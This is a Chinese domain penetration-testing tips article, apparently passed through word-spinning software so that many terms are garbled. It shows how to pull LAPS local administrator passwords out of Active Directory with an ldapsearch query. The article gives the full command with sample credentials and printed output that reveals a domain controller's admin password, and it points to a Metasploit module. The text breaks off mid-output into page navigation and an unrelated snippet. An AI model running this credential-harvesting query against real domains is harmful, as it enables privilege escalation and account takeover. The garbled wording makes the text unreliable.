如不雅你之前有对启用LAPS机制的主机进行渗入渗出测试，那么你应当能领会到该机制的随机化本地治理员暗码是有多么令人苦楚。

LAPS将其信息存储在晃荡目次：

• 存储暗码过不时光：ms-Mcs-AdmPwdExpirationTime: 131461867015760024
• 以明文显示的存储暗码：ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

LAPS早期版本中，任何用户都可以或许攫取晃荡目次中的内容。还好微软已经修复，今朝你必须获得该对象的所有扩大权限或者是完全控制权限才能够进行拜访。

在复杂的┞锋实情况中，内网主机中还可能存在隐蔽的OU权限治理员，甚至是拥有完全控制权限的，负责特定用户组的一个标准用户。

得益于Meatballs开辟的Metasploit模块：

https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_laps.rb 赞助我们完成了这项工作。然则我们弗成能每次都特地打开一个Meterpreter会话来运行该模块吧?

解析：

• -x – 应用基本身份验证
• -h 192.168.80.10 – 将ldap连接到域控制器
• -D “helpdesk” -w ASDqwe123 – 以用户名helpdesk,暗码ASDqwe123进行登录
• -b “dc=sittingduck,dc=info” – 加载全部域的基本LDAP对象
• “(ms-MCS-AdmPwd=*)” – 过滤掉落所有不克不及查看的ms-MCS-AdmPwd值 (只要拥有足够的权限，甚至还可以获取Administrator暗码)
• ms-MCS-AdmPwd – 仅显示ms-MCS-AdmPwd对象 (默认包含对象名以及DN，所以你照样能知道主机从属关系)

应用ldapsearch(包含在Debian/Ubuntu的ldapscripts法度榜样包中)可以被用来构造与该模块雷同的请求，以下就是一个例子：

ldapsearch -x -h 192.168.80.10 -D \ 
"helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" \ 
"(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 

运行情况如下：

$ ldapsearch -x -h 192.168.80.10 -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 
# extended LDIF 
# 
# LDAPv3 
# base <dcdc=sittingduck,dc=info> with scope subtree 
# filter: (ms-MCS-AdmPwd=*) 
# requesting: ms-MCS-AdmPwd 
# 
 
# DC1, Domain Controllers, sittingduck.info 
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info 
ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F 
 
# SDCLIENT_DAWIN7, LabComputers, Lab, sittingduck.info 
dn: CN=SDCLIENT_DAWIN7,OU=	
			
 1/2    1 2 下一页 尾页
	
			

　　推荐阅读
　　那些有趣/用的Python库
            
            图片处理pip install httpstat  httpstat httpbin.org/get pip install pillow  from PIL import Image  import numpy as np  a = np.array(Image.open('test.jpg'))  b = [255,255,255] >>>详细阅读


本文标题：域渗透TIPS：获取LAPS管理员密码
地址：http://www.17bianji.com/lsqh/36610.html
 1/2    1